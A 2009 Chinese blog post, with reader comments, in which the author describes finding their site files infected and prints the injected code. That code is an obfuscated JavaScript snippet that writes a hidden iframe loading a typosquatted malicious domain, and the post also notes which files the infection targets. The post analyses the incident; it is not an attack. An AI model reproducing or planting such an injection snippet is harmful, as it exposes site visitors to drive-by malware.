空间被大面积挂马。
July/9th 2009
最近莫名其妙的博客打不开,一查,发现用作跳转的index.php被加了东西。是一个iframe的马。那段php代码还有错误,汗~~所以造成无法跳转。后来经过调查,发现这个马的一些特征:
2980 read 20 comment(s)
一般感染只感染 index.php , main.php, login.php, index.html。
核心代码类似:
<script>document.write("<"+'if'+''+'ra'+''+"me"+' sr'+"c=\"ht"+'t'+"p:"+''+"/"+''+'/mic'+"roso"+"tf"+''+'.c'+''+"n"+'/'+"\" wid"+''+"th=1 h"+"eigh"+''+'t'+"="+"2></i"+''+"fr"+"a"+''+""+''+"me"+'>');</script><script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>
可以看到iframe的页面指向 microsotf.cn (不用惊恐,不是microsoft~~)。Google这个网页,发现这个网页是俄罗斯的。报告有2个病毒。现在已经无法访问了。
现在一时也查不到中招的原因。只有写个脚本修复被修改的文件吧。。。 2980 read 20 comment(s)
添加新的评论
称呼:*邮件:*
网站:
内容:
奇虎反驳:瑞星不懂技术
呃。。瑞星是流氓软件。。我的电脑一直保持裸奔状态。。
你用mac,当然可以裸奔。我从有了自己的电脑起就一直用的是eset。个人感觉eset的nod32与瑞星是两个截然不同的风格,nod32超安静,颇有大侠的风范,而瑞星则是芙蓉姐姐,身体巨大且还爱炫耀。
如今,瑞星快不行了,叫都没有力气了……
应该不是,可能是谁上传了恶意脚本。
唉。。想和你一起使用服务器,不知道安全部安全。。。
无论是对你还是对我
服务器是linux操作系统,这次挂马应该是有个php的脚本出了问题。几乎不会是系统的问题。
裸奔?你就不怕密码被盗?
可以啊。想要的话我们私下谈。
我估计是网页漏洞。服务器是linux操作系统,而且有专人维护,几乎不会出问题。
又没有病毒,密码怎么可能被盗。。。。
好呀~~
我的域名是在SUDU.CN申请的,能转到国外吗?
听说前一段时间国内的域名经常不能访问。
域名能不能转我不知道,至少比较麻烦吧。。
小网站人家不值得挂
恭喜啊
希望cmstop安全度高点